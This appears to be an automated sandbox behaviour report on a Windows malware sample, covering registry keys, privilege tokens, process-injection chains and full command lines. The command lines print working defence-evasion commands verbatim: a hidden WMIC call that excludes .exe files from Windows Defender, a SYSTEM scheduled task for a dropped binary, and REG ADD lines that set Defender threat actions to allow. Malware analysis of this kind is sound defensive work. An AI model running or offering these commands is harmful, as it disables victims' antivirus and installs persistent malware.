Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer | C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\vAelVis.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | C:\Windows\SysWOW64\rundll32.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SysWOW64\rundll32.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{fb412698-0000-0000-0000-d01200000000}\NukeOnDelete = "0" | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target | Events
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A | 6
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A | 2
N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe | N/A | 16
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A | 2
N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe | N/A | 38

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: 33 (SeIncreaseWorkingSetPrivilege) | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: 34 (SeTimeZonePrivilege) | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: 35 (SeCreateSymbolicLinkPrivilege) | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: 36 (SeDelegateSessionUserImpersonatePrivilege) | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: 33 (SeIncreaseWorkingSetPrivilege) | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: 34 (SeTimeZonePrivilege) | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: 35 (SeCreateSymbolicLinkPrivilege) | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: 36 (SeDelegateSessionUserImpersonatePrivilege) | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1116 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\d4e6b02474cfe7ced5d87fa102e90e3d419adc2985567c65438f8debac9fa833.exe C:\Users\Admin\AppData\Local\Temp\7zS3DF3.tmp\Install.exe
PID 1116 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\d4e6b02474cfe7ced5d87fa102e90e3d419adc2985567c65438f8debac9fa833.exe C:\Users\Admin\AppData\Local\Temp\7zS3DF3.tmp\Install.exe
PID 1116 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\d4e6b02474cfe7ced5d87fa102e90e3d419adc2985567c65438f8debac9fa833.exe C:\Users\Admin\AppData\Local\Temp\7zS3DF3.tmp\Install.exe
PID 3208 wrote to memory of 4624 N/A C:\Users\Admin\AppData\Local\Temp\7zS3DF3.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 3208 wrote to memory of 4624 N/A C:\Users\Admin\AppData\Local\Temp\7zS3DF3.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 3208 wrote to memory of 4624 N/A C:\Users\Admin\AppData\Local\Temp\7zS3DF3.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 4624 wrote to memory of 2136 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4624 wrote to memory of 2136 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4624 wrote to memory of 2136 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2136 wrote to memory of 544 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2136 wrote to memory of 544 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2136 wrote to memory of 544 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 544 wrote to memory of 2468 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 544 wrote to memory of 2468 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 544 wrote to memory of 2468 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 3208 wrote to memory of 3952 N/A C:\Users\Admin\AppData\Local\Temp\7zS3DF3.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 3208 wrote to memory of 3952 N/A C:\Users\Admin\AppData\Local\Temp\7zS3DF3.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 3208 wrote to memory of 3952 N/A C:\Users\Admin\AppData\Local\Temp\7zS3DF3.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 4456 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\vAelVis.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4456 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\vAelVis.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4456 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\vAelVis.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3052 wrote to memory of 2512 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3052 wrote to memory of 2512 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3052 wrote to memory of 2512 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2512 wrote to memory of 4696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2512 wrote to memory of 4696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2512 wrote to memory of 4696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 3712 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 3712 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 3712 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 4768 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 4768 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 4768 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 3204 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 3204 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 3204 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 2168 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 2168 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 2168 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 1612 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 1612 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 1612 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 3528 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 3528 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 3528 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 2024 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 2024 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 2024 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 4168 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 4168 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 4168 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 2476 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 2476 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 2476 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 1212 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 1212 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 1212 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 4452 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 4452 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 4452 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 1372 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 1372 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 1372 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 2144 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\d4e6b02474cfe7ced5d87fa102e90e3d419adc2985567c65438f8debac9fa833.exe

"C:\Users\Admin\AppData\Local\Temp\d4e6b02474cfe7ced5d87fa102e90e3d419adc2985567c65438f8debac9fa833.exe"

C:\Users\Admin\AppData\Local\Temp\7zS3DF3.tmp\Install.exe

.\Install.exe /PdidDDD "385118" /S

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bEcIFlOHxifjjBuFoU" /SC once /ST 17:02:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\vAelVis.exe\" 1V /LPsite_idWmK 385118 /S" /V1 /F

C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\vAelVis.exe

C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\vAelVis.exe 1V /LPsite_idWmK 385118 /S

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

